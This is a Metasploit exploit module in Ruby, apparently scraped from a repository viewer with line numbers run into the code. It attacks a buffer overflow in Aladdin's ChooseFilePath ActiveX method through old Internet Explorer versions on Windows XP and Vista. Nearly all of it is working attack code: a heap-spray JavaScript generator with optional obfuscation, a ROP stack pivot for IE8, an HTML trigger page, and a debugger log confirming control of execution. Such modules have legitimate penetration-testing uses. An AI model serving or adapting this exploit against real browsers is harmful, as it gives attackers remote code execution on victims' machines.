Path: blob/master/modules/exploits/windows/browser/aladdin_choosefilepath_bof.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::Remote::BrowserExploitServer910def initialize(info = {})11super(12update_info(13info,14'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",15'Description' => %q{16This module exploits a vulnerability found in Aladdin Knowledge System's17ActiveX component. By supplying a long string of data to the ChooseFilePath()18function, a buffer overflow occurs, which may result in remote code execution19under the context of the user.20},21'License' => MSF_LICENSE,22'Author' => [23'shinnai', # Vulnerability Discovery24'b33f', # Original exploit25'sinn3r', # Metasploit26'juan vazquez' # Metasploit, IE8 target27],28'References' => [29[ 'OSVDB', '86723' ],30[ 'EDB', '22258' ],31[ 'EDB', '22301' ]32],33'Payload' => {34'StackAdjustment' => -350035},36'DefaultOptions' => {37'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'38},39'Platform' => 'win',40'BrowserRequirements' => {41:source => /script|headers/i,42:activex => [43{44clsid: "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}",45method: "ChooseFilePath"46}47],48:os_name => OperatingSystems::Match::WINDOWS,49},50'Targets' => [51[ 'Automatic', {} ],52[53'Windows XP with IE 6',54{55'os_name' => OperatingSystems::Match::WINDOWS_XP,56'ua_name' => 'MSIE',57'ua_ver' => '6.0',58'Rop' => false,59'Offset' => '0x5F4',60'Ret' => 0x0c0c0c0c61}62],63[64'Windows XP with IE 7',65{66'os_name' => OperatingSystems::Match::WINDOWS_XP,67'ua_name' => 'MSIE',68'ua_ver' => '7.0',69'Rop' => false,70'Offset' => '0x5F4',71'Ret' => 0x0c0c0c0c72}73],74[75'Windows XP with IE 8',76{77'os_name' => OperatingSystems::Match::WINDOWS_XP,78'ua_name' => 'MSIE',79'ua_ver' => '8.0',80'Rop' => true,81'Offset' => '0x5f6',82'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll83}84],85[86'Windows Vista with IE 7',87{88'os_name' => OperatingSystems::Match::WINDOWS_VISTA,89'ua_name' => 'MSIE',90'ua_ver' => '7.0',91'Rop' => false,92'Offset' => '0x5F4',93'Ret' => 0x0c0c0c0c94}95]9697],98'Privileged' => false,99'DisclosureDate' => '2012-04-01',100'DefaultTarget' => 0,101'Notes' => {102'Reliability' => UNKNOWN_RELIABILITY,103'Stability' => UNKNOWN_STABILITY,104'SideEffects' => UNKNOWN_SIDE_EFFECTS105}106)107)108109register_options(110[111OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])112], self.class113)114end115116def ie_heap_spray(p)117js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch))118js_nops = Rex::Text.to_unescape("\x0c" * 4, Rex::Arch.endian(get_target.arch))119randnop = rand_text_alpha(rand(100) + 1)120121# Land the payload at 0x0c0c0c0c122123js = %Q|124var heap_obj = new heapLib.ie(0x20000);125var code = unescape("#{js_code}");126var #{randnop} = "#{js_nops}";127var nops = unescape(#{randnop});128while (nops.length < 0x80000) nops += nops;129var offset = nops.substring(0, #{get_target['Offset']});130var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);131while (shellcode.length < 0x40000) shellcode += shellcode;132var block = shellcode.substring(0, (0x80000-6)/2);133heap_obj.gc();134for (var i=1; i < 0x300; i++) {135heap_obj.alloc(block);136}137|138139js = heaplib(js, { :noobfu => true })140141if datastore['OBFUSCATE']142js = ::Rex::Exploitation::JSObfu.new(js)143js.obfuscate(memory_sensitive: true)144end145146return js147end148149def exploit_template(cli, target_info)150if get_target['Rop']151p = generate_rop_payload('msvcrt', get_payload(cli, target_info), { 'target' => 'xp' })152else153p = get_payload(cli, target_info)154end155156spray = ie_heap_spray(p)157target_ret = Rex::Text.to_hex([get_target.ret].pack("V"))158159html_template = %Q|160<html>161<object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object>162<script>163<%=spray%>164junk='';165for( counter=0; counter<=267; counter++) junk+=unescape("%0c");166pwnd.ChooseFilePath(junk + "<%=target_ret%>");167</script>168</html>169|170171return html_template, binding()172end173174def on_request_exploit(cli, request, target_info)175print_status("Sending HTML...")176send_exploit_html(cli, exploit_template(cli, target_info))177end178end179180=begin1810:008> g182(82c.12dc): Access violation - code c0000005 (first chance)183First chance exceptions are reported before any exception handling.184This exception may be expected and handled.185eax=0c0c0c0c ebx=00001d56 ecx=020b93d4 edx=00001d56 esi=00001d60 edi=020b93e8186eip=7712a41a esp=020b93bc ebp=020b93c4 iopl=0 nv up ei pl zr na pe nc187cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246188OLEAUT32!SysReAllocStringLen+0x31:1897712a41a 8b00 mov eax,dword ptr [eax] ds:0023:0c0c0c0c=????????1900:008> g191(82c.12dc): Access violation - code c0000005 (first chance)192First chance exceptions are reported before any exception handling.193This exception may be expected and handled.194eax=00000000 ebx=00000000 ecx=0c0c0c0c edx=7c9032bc esi=00000000 edi=00000000195eip=0c0c0c0c esp=020b8fec ebp=020b900c iopl=0 nv up ei pl zr na pe nc196cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=000102461970c0c0c0c ?? ???1980:008> db 020bf798199020bf798 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................200020bf7a8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................201020bf7b8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................202020bf7c8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................203020bf7d8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................204020bf7e8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................205020bf7f8 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................206020bf808 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................207=end208209210